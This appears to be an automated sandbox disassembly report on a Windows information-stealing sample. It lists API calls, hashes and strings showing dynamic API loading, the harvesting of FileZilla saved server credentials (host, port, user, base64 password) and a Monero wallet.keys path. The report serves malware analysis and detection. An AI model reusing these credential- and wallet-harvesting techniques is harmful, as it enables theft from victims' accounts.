Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: c989b30b3270407e5f1cc5f4e5482c142333bf39c8a74b49de12eec95f63ce29
Instruction ID: 2fe8bda98a93f750bc1dde17664b84bc425e909bcd656b9cf5b7a4b59732e3d5
Opcode Fuzzy Hash: c989b30b3270407e5f1cc5f4e5482c142333bf39c8a74b49de12eec95f63ce29
Instruction Fuzzy Hash: DBF04FB1D44608ABC714DFD8DD89BAEFBBCEB05721F10025AFA45A2680C7B415048BA1

Function 000F1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 000F116A
ExitProcess.KERNEL32 ref: 000F117E

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: fea6a69146ef62bdced6222e883f15fae309047b85806e57c964c5db2d9c9baa
Instruction ID: c4e06b1717c0f098eae02e974a064882ac4a347db3c980c20826f584b3dc873d
Opcode Fuzzy Hash: fea6a69146ef62bdced6222e883f15fae309047b85806e57c964c5db2d9c9baa
Instruction Fuzzy Hash: 98D09E7490430CDBCB04DFE0D9C96EDBB7CFB08726F101655E94562740EA315595CAA6

Function 00109C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00CC5930), ref: 00109C2D
GetProcAddress.KERNEL32(74DD0000,00CC57D0), ref: 00109C45
GetProcAddress.KERNEL32(74DD0000,00CD9580), ref: 00109C5E
GetProcAddress.KERNEL32(74DD0000,00CD95E0), ref: 00109C76
GetProcAddress.KERNEL32(74DD0000,00CD9628), ref: 00109C8E
GetProcAddress.KERNEL32(74DD0000,00CD9568), ref: 00109CA7
GetProcAddress.KERNEL32(74DD0000,00CCBEF8), ref: 00109CBF
GetProcAddress.KERNEL32(74DD0000,00CDD588), ref: 00109CD7
GetProcAddress.KERNEL32(74DD0000,00CDD528), ref: 00109CF0
GetProcAddress.KERNEL32(74DD0000,00CDD4B0), ref: 00109D08
GetProcAddress.KERNEL32(74DD0000,00CDD468), ref: 00109D20
GetProcAddress.KERNEL32(74DD0000,00CC5810), ref: 00109D39
GetProcAddress.KERNEL32(74DD0000,00CC5950), ref: 00109D51
GetProcAddress.KERNEL32(74DD0000,00CC59B0), ref: 00109D69
GetProcAddress.KERNEL32(74DD0000,00CC5610), ref: 00109D82
GetProcAddress.KERNEL32(74DD0000,00CDD3D8), ref: 00109D9A
GetProcAddress.KERNEL32(74DD0000,00CDD480), ref: 00109DB2
GetProcAddress.KERNEL32(74DD0000,00CCBC50), ref: 00109DCB
GetProcAddress.KERNEL32(74DD0000,00CC5650), ref: 00109DE3
GetProcAddress.KERNEL32(74DD0000,00CDD3F0), ref: 00109DFB
GetProcAddress.KERNEL32(74DD0000,00CDD438), ref: 00109E14
GetProcAddress.KERNEL32(74DD0000,00CDD4C8), ref: 00109E2C
GetProcAddress.KERNEL32(74DD0000,00CDD408), ref: 00109E44
GetProcAddress.KERNEL32(74DD0000,00CC5670), ref: 00109E5D
GetProcAddress.KERNEL32(74DD0000,00CDD420), ref: 00109E75
GetProcAddress.KERNEL32(74DD0000,00CDD558), ref: 00109E8D
GetProcAddress.KERNEL32(74DD0000,00CDD4E0), ref: 00109EA6
GetProcAddress.KERNEL32(74DD0000,00CDD450), ref: 00109EBE
GetProcAddress.KERNEL32(74DD0000,00CDD4F8), ref: 00109ED6
GetProcAddress.KERNEL32(74DD0000,00CDD540), ref: 00109EEF
GetProcAddress.KERNEL32(74DD0000,00CDD498), ref: 00109F07
GetProcAddress.KERNEL32(74DD0000,00CDD510), ref: 00109F1F
GetProcAddress.KERNEL32(74DD0000,00CDD570), ref: 00109F38
GetProcAddress.KERNEL32(74DD0000,00CDA820), ref: 00109F50
GetProcAddress.KERNEL32(74DD0000,00CDD030), ref: 00109F68
GetProcAddress.KERNEL32(74DD0000,00CDCFE8), ref: 00109F81
GetProcAddress.KERNEL32(74DD0000,00CC5690), ref: 00109F99
GetProcAddress.KERNEL32(74DD0000,00CDCE98), ref: 00109FB1
GetProcAddress.KERNEL32(74DD0000,00CC53F0), ref: 00109FCA
GetProcAddress.KERNEL32(74DD0000,00CDCEB0), ref: 00109FE2
GetProcAddress.KERNEL32(74DD0000,00CDCEC8), ref: 00109FFA
GetProcAddress.KERNEL32(74DD0000,00CC5530), ref: 0010A013
GetProcAddress.KERNEL32(74DD0000,00CC5270), ref: 0010A02B
LoadLibraryA.KERNEL32(00CDCDF0,?,00105CA3,00110AEB,?,?,?,?,?,?,?,?,?,?,00110AEA,00110AE3), ref: 0010A03D
LoadLibraryA.KERNEL32(00CDCF88,?,00105CA3,00110AEB,?,?,?,?,?,?,?,?,?,?,00110AEA,00110AE3), ref: 0010A04E
LoadLibraryA.KERNEL32(00CDD0A8,?,00105CA3,00110AEB,?,?,?,?,?,?,?,?,?,?,00110AEA,00110AE3), ref: 0010A060
LoadLibraryA.KERNEL32(00CDCE08,?,00105CA3,00110AEB,?,?,?,?,?,?,?,?,?,?,00110AEA,00110AE3), ref: 0010A072
LoadLibraryA.KERNEL32(00CDCFD0,?,00105CA3,00110AEB,?,?,?,?,?,?,?,?,?,?,00110AEA,00110AE3), ref: 0010A083
LoadLibraryA.KERNEL32(00CDCEE0,?,00105CA3,00110AEB,?,?,?,?,?,?,?,?,?,?,00110AEA,00110AE3), ref: 0010A095
LoadLibraryA.KERNEL32(00CDCE20,?,00105CA3,00110AEB,?,?,?,?,?,?,?,?,?,?,00110AEA,00110AE3), ref: 0010A0A7
LoadLibraryA.KERNEL32(00CDCF10,?,00105CA3,00110AEB,?,?,?,?,?,?,?,?,?,?,00110AEA,00110AE3), ref: 0010A0B8
GetProcAddress.KERNEL32(75290000,00CC54D0), ref: 0010A0DA
GetProcAddress.KERNEL32(75290000,00CDCFA0), ref: 0010A0F2
GetProcAddress.KERNEL32(75290000,00CD8EF0), ref: 0010A10A
GetProcAddress.KERNEL32(75290000,00CDD000), ref: 0010A123
GetProcAddress.KERNEL32(75290000,00CC54F0), ref: 0010A13B
GetProcAddress.KERNEL32(73440000,00CCB7F0), ref: 0010A160
GetProcAddress.KERNEL32(73440000,00CC5470), ref: 0010A179
GetProcAddress.KERNEL32(73440000,00CCB750), ref: 0010A191
GetProcAddress.KERNEL32(73440000,00CDD048), ref: 0010A1A9
GetProcAddress.KERNEL32(73440000,00CDCF70), ref: 0010A1C2
GetProcAddress.KERNEL32(73440000,00CC52D0), ref: 0010A1DA
GetProcAddress.KERNEL32(73440000,00CC5390), ref: 0010A1F2
GetProcAddress.KERNEL32(73440000,00CDD0C0), ref: 0010A20B
GetProcAddress.KERNEL32(752C0000,00CC5310), ref: 0010A22C
GetProcAddress.KERNEL32(752C0000,00CC53B0), ref: 0010A244
GetProcAddress.KERNEL32(752C0000,00CDD090), ref: 0010A25D
GetProcAddress.KERNEL32(752C0000,00CDCDD8), ref: 0010A275
GetProcAddress.KERNEL32(752C0000,00CC5330), ref: 0010A28D
GetProcAddress.KERNEL32(74EC0000,00CCBAE8), ref: 0010A2B3
GetProcAddress.KERNEL32(74EC0000,00CCB9F8), ref: 0010A2CB
GetProcAddress.KERNEL32(74EC0000,00CDCE38), ref: 0010A2E3
GetProcAddress.KERNEL32(74EC0000,00CC5490), ref: 0010A2FC
GetProcAddress.KERNEL32(74EC0000,00CC5510), ref: 0010A314
GetProcAddress.KERNEL32(74EC0000,00CCBB38), ref: 0010A32C
GetProcAddress.KERNEL32(75BD0000,00CDD060), ref: 0010A352
GetProcAddress.KERNEL32(75BD0000,00CC5550), ref: 0010A36A
GetProcAddress.KERNEL32(75BD0000,00CD8E80), ref: 0010A382
GetProcAddress.KERNEL32(75BD0000,00CDCFB8), ref: 0010A39B
GetProcAddress.KERNEL32(75BD0000,00CDD018), ref: 0010A3B3
GetProcAddress.KERNEL32(75BD0000,00CC5430), ref: 0010A3CB
GetProcAddress.KERNEL32(75BD0000,00CC5570), ref: 0010A3E4
GetProcAddress.KERNEL32(75BD0000,00CDCE50), ref: 0010A3FC
GetProcAddress.KERNEL32(75BD0000,00CDCF28), ref: 0010A414
GetProcAddress.KERNEL32(75A70000,00CC5210), ref: 0010A436
GetProcAddress.KERNEL32(75A70000,00CDD078), ref: 0010A44E
GetProcAddress.KERNEL32(75A70000,00CDCE68), ref: 0010A466
GetProcAddress.KERNEL32(75A70000,00CDCE80), ref: 0010A47F
GetProcAddress.KERNEL32(75A70000,00CDCEF8), ref: 0010A497
GetProcAddress.KERNEL32(75450000,00CC52B0), ref: 0010A4B8
GetProcAddress.KERNEL32(75450000,00CC5590), ref: 0010A4D1
GetProcAddress.KERNEL32(75DA0000,00CC55B0), ref: 0010A4F2
GetProcAddress.KERNEL32(75DA0000,00CDCF40), ref: 0010A50A
GetProcAddress.KERNEL32(6F070000,00CC54B0), ref: 0010A530
GetProcAddress.KERNEL32(6F070000,00CC5450), ref: 0010A548
GetProcAddress.KERNEL32(6F070000,00CC5350), ref: 0010A560
GetProcAddress.KERNEL32(6F070000,00CDCF58), ref: 0010A579
GetProcAddress.KERNEL32(6F070000,00CC5230), ref: 0010A591
GetProcAddress.KERNEL32(6F070000,00CC55D0), ref: 0010A5A9
GetProcAddress.KERNEL32(6F070000,00CC55F0), ref: 0010A5C2
GetProcAddress.KERNEL32(6F070000,00CC5250), ref: 0010A5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0010A5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0010A607
GetProcAddress.KERNEL32(75AF0000,00CDD1B0), ref: 0010A629
GetProcAddress.KERNEL32(75AF0000,00CD8ED0), ref: 0010A641
GetProcAddress.KERNEL32(75AF0000,00CDD240), ref: 0010A659
GetProcAddress.KERNEL32(75AF0000,00CDD390), ref: 0010A672
GetProcAddress.KERNEL32(75D90000,00CC5290), ref: 0010A693
GetProcAddress.KERNEL32(6CF60000,00CDD168), ref: 0010A6B4
GetProcAddress.KERNEL32(6CF60000,00CC52F0), ref: 0010A6CD
GetProcAddress.KERNEL32(6CF60000,00CDD120), ref: 0010A6E5
GetProcAddress.KERNEL32(6CF60000,00CDD1C8), ref: 0010A6FD

Strings

InternetSetOptionA, xrefs: 0010A5E5
HttpQueryInfoA, xrefs: 0010A5FC

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 847c635933a2f938427bcd097491d44e0185c9bed82b30622a19a77192dae310
Instruction ID: 38c823bc1ca1f0b9d3c6c382205e2f611fa80b61c4cbfee2a1f0807e46bec34e
Opcode Fuzzy Hash: 847c635933a2f938427bcd097491d44e0185c9bed82b30622a19a77192dae310
Instruction Fuzzy Hash: 3B624AB5504A00AFC346DFA9EDC8D663BFDF79C301F04851AA689C7274D73A9841DB52

Function 000F7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000F7724
RtlAllocateHeap.NTDLL(00000000), ref: 000F772B
lstrcat.KERNEL32(?,00CD9DD8), ref: 000F78DB
lstrcat.KERNEL32(?,?), ref: 000F78EF
lstrcat.KERNEL32(?,?), ref: 000F7903
lstrcat.KERNEL32(?,?), ref: 000F7917
lstrcat.KERNEL32(?,00CDE4D8), ref: 000F792B
lstrcat.KERNEL32(?,00CDE550), ref: 000F793F
lstrcat.KERNEL32(?,00CDE598), ref: 000F7952
lstrcat.KERNEL32(?,00CDE478), ref: 000F7966
lstrcat.KERNEL32(?,00CDE5C0), ref: 000F797A
lstrcat.KERNEL32(?,?), ref: 000F798E
lstrcat.KERNEL32(?,?), ref: 000F79A2
lstrcat.KERNEL32(?,?), ref: 000F79B6
lstrcat.KERNEL32(?,00CDE4D8), ref: 000F79C9
lstrcat.KERNEL32(?,00CDE550), ref: 000F79DD
lstrcat.KERNEL32(?,00CDE598), ref: 000F79F1
lstrcat.KERNEL32(?,00CDE478), ref: 000F7A04
lstrcat.KERNEL32(?,00CDE628), ref: 000F7A18
lstrcat.KERNEL32(?,?), ref: 000F7A2C
lstrcat.KERNEL32(?,?), ref: 000F7A40
lstrcat.KERNEL32(?,?), ref: 000F7A54
lstrcat.KERNEL32(?,00CDE4D8), ref: 000F7A68
lstrcat.KERNEL32(?,00CDE550), ref: 000F7A7B
lstrcat.KERNEL32(?,00CDE598), ref: 000F7A8F
lstrcat.KERNEL32(?,00CDE478), ref: 000F7AA3
lstrcat.KERNEL32(?,00CDE690), ref: 000F7AB6
lstrcat.KERNEL32(?,?), ref: 000F7ACA
lstrcat.KERNEL32(?,?), ref: 000F7ADE
lstrcat.KERNEL32(?,?), ref: 000F7AF2
lstrcat.KERNEL32(?,00CDE4D8), ref: 000F7B06
lstrcat.KERNEL32(?,00CDE550), ref: 000F7B1A
lstrcat.KERNEL32(?,00CDE598), ref: 000F7B2D
lstrcat.KERNEL32(?,00CDE478), ref: 000F7B41
lstrcat.KERNEL32(?,00CDE6F8), ref: 000F7B55
lstrcat.KERNEL32(?,?), ref: 000F7B69
lstrcat.KERNEL32(?,?), ref: 000F7B7D
lstrcat.KERNEL32(?,?), ref: 000F7B91
lstrcat.KERNEL32(?,00CDE4D8), ref: 000F7BA4
lstrcat.KERNEL32(?,00CDE550), ref: 000F7BB8
lstrcat.KERNEL32(?,00CDE598), ref: 000F7BCC
lstrcat.KERNEL32(?,00CDE478), ref: 000F7BDF
lstrcat.KERNEL32(?,00CDE760), ref: 000F7BF3
lstrcat.KERNEL32(?,?), ref: 000F7C07
lstrcat.KERNEL32(?,?), ref: 000F7C1B
lstrcat.KERNEL32(?,?), ref: 000F7C2F
lstrcat.KERNEL32(?,00CDE4D8), ref: 000F7C43
lstrcat.KERNEL32(?,00CDE550), ref: 000F7C56
lstrcat.KERNEL32(?,00CDE598), ref: 000F7C6A
lstrcat.KERNEL32(?,00CDE478), ref: 000F7C7E

Part of subcall function 000F75D0: lstrcat.KERNEL32(2F4AD020,001117FC), ref: 000F7606
Part of subcall function 000F75D0: lstrcat.KERNEL32(2F4AD020,00000000), ref: 000F7648
Part of subcall function 000F75D0: lstrcat.KERNEL32(2F4AD020, : ), ref: 000F765A
Part of subcall function 000F75D0: lstrcat.KERNEL32(2F4AD020,00000000), ref: 000F768F
Part of subcall function 000F75D0: lstrcat.KERNEL32(2F4AD020,00111804), ref: 000F76A0
Part of subcall function 000F75D0: lstrcat.KERNEL32(2F4AD020,00000000), ref: 000F76D3
Part of subcall function 000F75D0: lstrcat.KERNEL32(2F4AD020,00111808), ref: 000F76ED
Part of subcall function 000F75D0: task.LIBCPMTD ref: 000F76FB

lstrcat.KERNEL32(?,00CDE8A8), ref: 000F7E0B
lstrcat.KERNEL32(?,00CDDBE0), ref: 000F7E1E
lstrlen.KERNEL32(2F4AD020), ref: 000F7E2B
lstrlen.KERNEL32(2F4AD020), ref: 000F7E3B

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: d6b2dd37e4afce8cef5459403a978a55f11ed711ee11f17034a7e94a5a7dcb01
Instruction ID: 465a50f05406f803349703dd83405e0c2786b388b642f23fb39204bb7289c7a9
Opcode Fuzzy Hash: d6b2dd37e4afce8cef5459403a978a55f11ed711ee11f17034a7e94a5a7dcb01
Instruction Fuzzy Hash: 813241B2C04718ABC715EBA0DCC5DEA777CBB54701F044688F289A6091EFB5E7898F52

Function 00100250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 00108DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00108E0B

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000F99EC
Part of subcall function 000F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000F9A11
Part of subcall function 000F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000F9A31
Part of subcall function 000F99C0: ReadFile.KERNEL32(000000FF,?,00000000,000F148F,00000000), ref: 000F9A5A
Part of subcall function 000F99C0: LocalFree.KERNEL32(000F148F), ref: 000F9A90
Part of subcall function 000F99C0: CloseHandle.KERNEL32(000000FF), ref: 000F9A9A

Part of subcall function 00108E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00108E52

GetProcessHeap.KERNEL32(00000000,000F423F,00110DBA,00110DB7,00110DB6,00110DB3), ref: 00100362
RtlAllocateHeap.NTDLL(00000000), ref: 00100369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00100385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 00100393
StrStrA.SHLWAPI(00000000,<Port>), ref: 001003CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 001003DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00100419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 00100427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00100463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 00100475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 00100502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 0010051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 00100532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 0010054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00100562
lstrcat.KERNEL32(?,profile: null), ref: 00100571
lstrcat.KERNEL32(?,url: ), ref: 00100580
lstrcat.KERNEL32(?,00000000), ref: 00100593
lstrcat.KERNEL32(?,00111678), ref: 001005A2
lstrcat.KERNEL32(?,00000000), ref: 001005B5
lstrcat.KERNEL32(?,0011167C), ref: 001005C4
lstrcat.KERNEL32(?,login: ), ref: 001005D3
lstrcat.KERNEL32(?,00000000), ref: 001005E6
lstrcat.KERNEL32(?,00111688), ref: 001005F5
lstrcat.KERNEL32(?,password: ), ref: 00100604
lstrcat.KERNEL32(?,00000000), ref: 00100617
lstrcat.KERNEL32(?,00111698), ref: 00100626
lstrcat.KERNEL32(?,0011169C), ref: 00100635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00110DB2), ref: 0010068E

Strings

url: , xrefs: 00100577
password: , xrefs: 001005FB
<Port>, xrefs: 001003C6
browser: FileZilla, xrefs: 00100559
<User>, xrefs: 00100410
login: , xrefs: 001005CA
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 001002A4
<Pass encoding="base64">, xrefs: 0010045A
<Host>, xrefs: 0010037C
profile: null, xrefs: 00100568

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
